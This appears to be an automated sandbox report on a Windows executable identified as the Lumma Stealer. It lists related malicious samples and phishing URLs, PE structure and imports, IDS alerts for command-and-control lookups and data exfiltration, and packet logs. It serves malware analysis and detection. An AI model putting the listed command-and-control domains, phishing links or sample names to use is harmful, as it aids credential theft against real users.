	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	OXoeX1Ii3x.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Exlan_setup_v3.1.2.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Bootstrapper.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	GPU-Z.exe	Get hash	malicious	LummaC, DarkTortilla, LummaC Stealer	Browse	104.102.49.254
	gdi32.dll	Get hash	malicious	LummaC	Browse	23.55.153.106

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08ok	Get hash	malicious	HTMLPhisher	Browse	104.18.142.119
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	104.18.26.193
	https://midoregoncu-securemessagecenter.s3.us-east-1.amazonaws.com/open/message_12832.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://bit.ly/3W6tVJJ?BRK=80HiTWCpll	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://klickskydd.skolverket.org/?url=https%3A%2F%2Fwww.gazeta.ru%2Fpolitics%2Fnews%2F2024%2F12%2F22%2F24684722.shtml&id=71de&rcpt=upplysningstjansten@skolverket.se&tss=1735469857&msgid=b53e7603-c5d3-11ef-8a2e-0050569b0508&html=1&h=ded85c63	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
	https://www.gazeta.ru/politics/news/2024/12/22/24684722.shtml	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	104.26.9.117
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
AKAMAI-ASUS	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	https://ntta.org-pay-u5ch.sbs/us/	Get hash	malicious	Unknown	Browse	23.32.185.35
	DEMONS.x86.elf	Get hash	malicious	Unknown	Browse	96.25.164.130
	DEMONS.spc.elf	Get hash	malicious	Unknown	Browse	104.115.175.219
	ab_j	Get hash	malicious	Rust Stealer	Browse	23.67.65.229
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	104.102.49.254
	armv6l.elf	Get hash	malicious	Unknown	Browse	104.72.144.32
	https://bitl.to/3Y0B	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.102.43.106
	KRNL.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	96.17.237.158

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	172.67.157.254 104.102.49.254
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	172.67.157.254 104.102.49.254
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	172.67.157.254 104.102.49.254
	MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zip	Get hash	malicious	Unknown	Browse	172.67.157.254 104.102.49.254
	Setup.exe.7z	Get hash	malicious	Unknown	Browse	172.67.157.254 104.102.49.254
	176.113.115.170.ps1	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254
	ETVk1yP43q.exe	Get hash	malicious	AZORult	Browse	172.67.157.254 104.102.49.254
	UhsjR3ZFTD.exe	Get hash	malicious	LummaC	Browse	172.67.157.254 104.102.49.254

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_8ef93764243ab4ee0761b126a9e6f5fe64f6ecf_8f5062a8_ae4341b8-e8e1-4fbe-9ccd-d8012edd11e1\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0192757841197153
Encrypted:	false
SSDEEP:	192:OMo37y9gwqvrPPf0PtkO0P3jRmmJIzuiFbZ24IO8TOB:xortrMPWO8jozuiFbY4IO8C
MD5:	C88537A5C3EB83DE43EA3FFB0BEAACB7
SHA1:	CA7E52ECF43DC3FE55A3CA41479228B51151587B
SHA-256:	0C824F912A4014AA2FD94149B1F140F4BFE6A2ABAE6F38C899F7FFBD665D51E0
SHA-512:	612CAFFA41192051D3CCDC8D27A77AC07B4594ABA811D2D6EC2AD7E24EEABBDC064330C10A220964E413F9081CB35C68EC5048EB528E322F396988557A8CCC99
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.9.0.0.8.9.6.8.5.0.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.9.0.0.9.4.9.9.7.5.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.4.3.4.1.b.8.-.e.8.e.1.-.4.f.b.e.-.9.c.c.d.-.d.8.0.1.2.e.d.d.1.1.e.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.6.2.e.d.c.3.-.7.f.a.f.-.4.2.7.c.-.9.e.3.6.-.9.9.5.4.4.5.8.6.7.8.b.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.d.0.-.0.0.0.1.-.0.0.1.4.-.4.3.e.c.-.c.3.d.6.4.a.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.c.8.a.6.d.f.e.9.7.d.3.3.a.d.a.8.6.c.6.5.2.9.8.a.d.9.1.a.b.4.6.e.d.d.c.8.4.5.4.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.2.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERD2F.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Thu Jan 2 19:16:49 2025, 0x1205a4 type
Category:	dropped
Size (bytes):	53760
Entropy (8bit):	2.7195045139032845
Encrypted:	false
SSDEEP:	192:TVG3YqXKREmwl+HOtO1BBCqVhOZHCEILjtuqHQ9BBsmofyt7uHnxSA9nAZBdrq:hYKRERl+HVLBCfN9uAi0A9A7drq
MD5:	7D0707333FA82D65F9B4E1F544C06004
SHA1:	7E260EBC4C85948B193CB82310E354ACB0DB04DC
SHA-256:	C52F7C7C2E17439F4303C2D28330E6B9E26AB99A37AEFE2C881F526C611DA98F
SHA-512:	E540ECF30D180B0F8F5E9EADD16BD38AC29BC5981155BF40C297D1BB9C10746762AA9B581EBE80A8C564FBB3E5821291C6C36B08BD19951F2740CED66768B564
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......!.vg............4...............H............!...........6..........`.......8...........T...........8F.............."...........$..............................................................................eJ......x%......GenuineIntel............T.............vg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE59.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.688331787150665
Encrypted:	false
SSDEEP:	192:R6l7wVeJQCX6+t6W6YNZSUv3gmfBLfZSpDT89bGesf0xo3+Cm:R6lXJX6hW6YDSUv3gmfVVGdfAoC
MD5:	DDF1D33CA0C43F1FF0E694C6718B85EE
SHA1:	D7275F99DC44D020E520F06B9146DF4AEB6587B7
SHA-256:	562F4574290AD13D12AC431DEF2FB218A8C152A3C736484FBE15FE504534C520
SHA-512:	23B49E79F24728CE1829956FC356927037428102DCBCFC9411B57B4A85D34695CE8ED1DB6AB1D6E516FDDFC318D6683709A718FA20DE1BED9C401815C4483004
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.4.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERE89.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.4247339132093195
Encrypted:	false
SSDEEP:	48:cvIwWl8zsfJg77aI9c/WpW8VYzYm8M4JuUF5Z+q8FS/qSzgYd:uIjfBI76u7VDJVjySzgYd
MD5:	C92EBC3E6D5452FC14DF15D4A3CFD2AD
SHA1:	4455DE369ADB07B91A93B60F85450140C077935A
SHA-256:	B54713583588CE0F0204D4A76C42F77DD4F644D4100632C50C8278580946B173
SHA-512:	ACEBD7C94BC03C496A252195873A750468B35B80E376667231BC28829FE41408BD7B3E64E5A949BFF92D9D63E69343EA6471F2DD230F9578F176C77C9F66CFF1
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658699" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.416528826872322
Encrypted:	false
SSDEEP:	6144:mcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuN85+:Di58oSWIZBk2MM6AFBqo
MD5:	38BA31A6E75B803882E23449CB70D4A9
SHA1:	516A3BE36C312751A9B992921070555815162215
SHA-256:	5DECFE6B020E42C9E7F2022FA2C79C86C2BB994D1BB904EB72BC4F3E79FF39E6
SHA-512:	CE1B689C18B35911231EFB437255F6375BEB521D67C86CB759EBC30620455DD8A22900858C9A8F414C4463368176A76EB6BB78AC0DA68E0D0A9B38CF1217E9C8
Malicious:	false
Reputation:	low
Preview:	regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmN...J]..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.309261993974339
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	317'952 bytes
MD5:	2ea329cf21fe95c260ea3b956b6fbb75
SHA1:	4c8a6dfe97d33ada86c65298ad91ab46eddc8454
SHA256:	36c05fed693856403b0e8aa36b032d350424ec12a657cb9a98f974f218db3884
SHA512:	9ba7c26d15f6a116489e69c364f51484fa028dc92cf76a15e7c49095707bc4d499e6da31e9c79e1c5d2b3047dcb0518e10fd01f163b9c6e71282fffb2e8eac90
SSDEEP:	6144:N0ytx8RRzYd1mH+CkaPSdpzybQiwRF/yCQaOn39cm4W8+:NpeRRzQ0BkFd40bbqC8Wms+
TLSH:	6264E022B952D472C98710304974DF61AB7EBD3216748A4737B8273E6FB02D2967A31B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\UG..4)..4)..4)..f..24)..f..=4)..f...4).?.R..4)..4(.c4)..f...4)..f...4)..f...4).Rich.4).........................PE..L.....\|f...

File Icon


Icon Hash:	0f2b25ae9f5d3b1f

Static PE Info

General

Entrypoint:	0x407176
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x667CE21A [Thu Jun 27 03:52:58 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	07893fd7e47cc055b130c321ac74f58f

Entrypoint Preview

Instruction
call 00007F6675133126h
jmp 00007F667512D13Dh
call 00007F667512D2FCh
xchg cl, ch
jmp 00007F667512D2E4h
call 00007F667512D2F3h
fxch st(0), st(1)
jmp 00007F667512D2DBh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007F667512D2D1h
mov byte ptr [ebp-00000090h], FFFFFFFEh
fabs
fxch st(0), st(1)
fabs
fxch st(0), st(1)
fpatan
or cl, cl
je 00007F667512D2C6h
fldpi
fsubrp st(1), st(0)
or ch, ch
je 00007F667512D2C4h
fchs
ret
fabs
fld st(0), st(0)
fld st(0), st(0)
fld1
fsubrp st(1), st(0)
fxch st(0), st(1)
fld1
faddp st(1), st(0)
fmulp st(1), st(0)
ftst
wait
fstsw word ptr [ebp-000000A0h]
wait
test byte ptr [ebp-0000009Fh], 00000001h
jne 00007F667512D2C7h
xor ch, ch
fsqrt
ret
pop eax
jmp 00007F667512DADFh
fstp st(0)
fld tbyte ptr [004451FAh]
ret
fstp st(0)
or cl, cl
je 00007F667512D2CDh
fstp st(0)
fldpi
or ch, ch
je 00007F667512D2C4h
fchs
ret
fstp st(0)
fldz
or ch, ch
je 00007F667512D2B9h
fchs
ret
fstp st(0)
jmp 00007F667512DAB5h
fstp st(0)
mov cl, ch
jmp 00007F667512D2C2h
call 00007F667512D28Eh
jmp 00007F667512DAC0h
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
add esp, FFFFFD30h
push ebx
wait
fstcw word ptr [ebp+0000005Ch]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x438bc	0x50	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x50000	0x3f48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5100	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x190	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x431fa	0x43200	c81f2290d046c92c18355eaa074f3433	False	0.8511915153631285	data	7.749741592856494	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x45000	0xae08	0x6400	4644b60b956e90e212497308381007c0	False	0.0894921875	dBase III DBT, next free block index 7565155, 1st item "\017\311\377?"	1.0768447025033605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x50000	0x8f48	0x4000	e320e917242708ba7c8eebf4e98b8acc	False	0.49029541015625	data	4.688368188433047	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x533f8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x53728	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_ICON	0x502a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.6923963133640553
RT_ICON	0x50968	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Romanian	Romania	0.4772821576763486
RT_ICON	0x52f10	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Romanian	Romania	0.7632978723404256
RT_STRING	0x53ab0	0x496	data	Romanian	Romania	0.4454855195911414
RT_ACCELERATOR	0x533a8	0x50	data	Romanian	Romania	0.825
RT_GROUP_CURSOR	0x53858	0x22	data			1.0294117647058822
RT_GROUP_ICON	0x53378	0x30	data	Romanian	Romania	0.9375
RT_VERSION	0x53880	0x230	data			0.5303571428571429

Imports

DLL	Import
KERNEL32.dll	EnumCalendarInfoA, WriteConsoleInputW, InterlockedDecrement, GetCurrentProcess, InterlockedCompareExchange, FindNextVolumeMountPointA, GetWindowsDirectoryA, EnumTimeFormatsW, ReadConsoleInputA, CopyFileW, GetConsoleAliasExesLengthW, CreateSemaphoreA, VerifyVersionInfoA, SetComputerNameExW, GetShortPathNameA, LCMapStringA, GetLogicalDriveStringsA, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, GetAtomNameA, LoadLibraryA, InterlockedExchangeAdd, SetCalendarInfoW, OpenEventA, GetCommMask, GlobalUnWire, GetModuleHandleA, FreeEnvironmentStringsW, EnumDateFormatsW, GetVersionExA, TerminateJobObject, GetCurrentProcessId, EnumCalendarInfoExA, CreateFileA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetCommandLineA, GetStartupInfoA, TerminateProcess, IsDebuggerPresent, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, Sleep, HeapSize, ExitProcess, MultiByteToWideChar, ReadFile, EnterCriticalSection, LeaveCriticalSection, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, HeapFree, WriteFile, GetModuleFileNameA, SetFilePointer, HeapCreate, VirtualFree, CloseHandle, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetSystemTimeAsFileTime, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, InitializeCriticalSectionAndSpinCount, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW
ole32.dll	CoSuspendClassObjects
WINHTTP.dll	WinHttpCheckPlatform

Possible Origin

Language of compilation system	Country where language is spoken	Map
Romanian	Romania

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T20:16:36.519517+0100	2058608	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz)	1	192.168.2.7	54538	1.1.1.1	53	UDP
2025-01-02T20:16:36.532234+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.7	60167	1.1.1.1	53	UDP
2025-01-02T20:16:36.543814+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.7	61164	1.1.1.1	53	UDP
2025-01-02T20:16:36.555116+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.7	53937	1.1.1.1	53	UDP
2025-01-02T20:16:36.565149+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.7	53377	1.1.1.1	53	UDP
2025-01-02T20:16:36.577393+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.7	57664	1.1.1.1	53	UDP
2025-01-02T20:16:36.589526+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.7	64956	1.1.1.1	53	UDP
2025-01-02T20:16:36.600816+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.7	61692	1.1.1.1	53	UDP
2025-01-02T20:16:36.612478+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.7	52039	1.1.1.1	53	UDP
2025-01-02T20:16:37.300052+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	104.102.49.254	443	TCP
2025-01-02T20:16:38.355437+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.7	49700	104.102.49.254	443	TCP
2025-01-02T20:16:38.960921+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49701	172.67.157.254	443	TCP
2025-01-02T20:16:39.387797+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49701	172.67.157.254	443	TCP
2025-01-02T20:16:39.387797+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49701	172.67.157.254	443	TCP
2025-01-02T20:16:40.006203+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49702	172.67.157.254	443	TCP
2025-01-02T20:16:40.457154+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49702	172.67.157.254	443	TCP
2025-01-02T20:16:40.457154+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49702	172.67.157.254	443	TCP
2025-01-02T20:16:41.147673+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49703	172.67.157.254	443	TCP
2025-01-02T20:16:42.581309+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49704	172.67.157.254	443	TCP
2025-01-02T20:16:44.220146+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49705	172.67.157.254	443	TCP
2025-01-02T20:16:46.058309+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49706	172.67.157.254	443	TCP
2025-01-02T20:16:47.123519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49708	172.67.157.254	443	TCP
2025-01-02T20:16:47.622921+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49708	172.67.157.254	443	TCP
2025-01-02T20:16:48.194549+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49714	172.67.157.254	443	TCP
2025-01-02T20:16:49.039380+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49714	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 20:16:36.638536930 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:36.638587952 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:36.638670921 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:36.641243935 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:36.641254902 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:37.299967051 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:37.300051928 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:37.307849884 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:37.307876110 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:37.308362007 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:37.356175900 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:37.669960976 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:37.715333939 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355495930 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355535984 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355571032 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355591059 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355612993 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355693102 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.355707884 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.355756998 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.355778933 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.448235035 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.448278904 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.448323965 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.448345900 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.448394060 CET	49700	443	192.168.2.7	104.102.49.254
Jan 2, 2025 20:16:38.453221083 CET	443	49700	104.102.49.254	192.168.2.7
Jan 2, 2025 20:16:38.453280926 CET	49700	443	192.168.2.7	104.102.49.254
